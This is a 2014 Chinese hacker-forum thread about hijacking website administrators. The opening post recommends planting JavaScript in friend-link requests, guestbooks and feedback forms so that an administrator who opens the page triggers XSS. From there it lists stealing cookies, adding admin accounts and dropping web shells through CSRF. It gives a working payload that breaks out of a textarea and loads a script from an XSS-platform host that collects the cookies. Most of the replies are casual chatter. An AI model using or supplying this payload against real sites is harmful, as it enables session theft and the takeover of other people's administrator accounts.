你这样做,何不如CSRF?
原帖地址:http://www.ihonker.org/thread-3271-1-4.html看了贴,我才知道这位仁兄可能不了解CSRF这么个好东西
从友情链接或者站内信以及留言反馈的地方,通过CSRF拿到后台或者拿到管理员账号密码早已不是新鲜事了。
我只是来提醒一下的
====================================================
比如:我们在友情链接申请的地方,放上一段JS,使得管理员点击(甚至都不用点击),鼠标移动上来
或者打开页面,就能触发xss
1.xss直接获取cookie
2.CSRF 发送cookie
3.CSRF 添加管理员
4.CSRF 生成一句话
5.CSRF 多了去了
例如直接拿cookie:
</textarea>'"><script src=http://x.xxoo.cc/8OTSbY?1407981679></script>
这是xss平台的代码,cookie值会发送到平台地址x.xxoo.cc对应的用户去。
乌云很多CSRF的组合拳应用,有个朋友出了一套组合拳
http://www.wooyun.org/bugs/wooyun-2014-071680
乌云 的那个洞目前还看不了 楼主的这个方法不错,可惜俺小白不会构造JS语句,这是蛋疼的地方啊:Q 要利用CSRF,首先要存在CSRF 个人表示还不会csrf,求大牛指点 90_ 发表于 2014-8-14 12:37
要利用CSRF,首先要存在CSRF
当然,这也需要一定的条件。
条件不支持,这条路也行不通{:2_38:}
话说论坛的表情能换点新鲜的吗?
总是这几个表情
学习一下,看帖就要回复, 楼主的这个方法不错,可惜俺小白不会构造JS语句,这是蛋疼的地方啊 :):)XSS盲打 我是电脑小白,打酱油的,路过学习
页:
[1]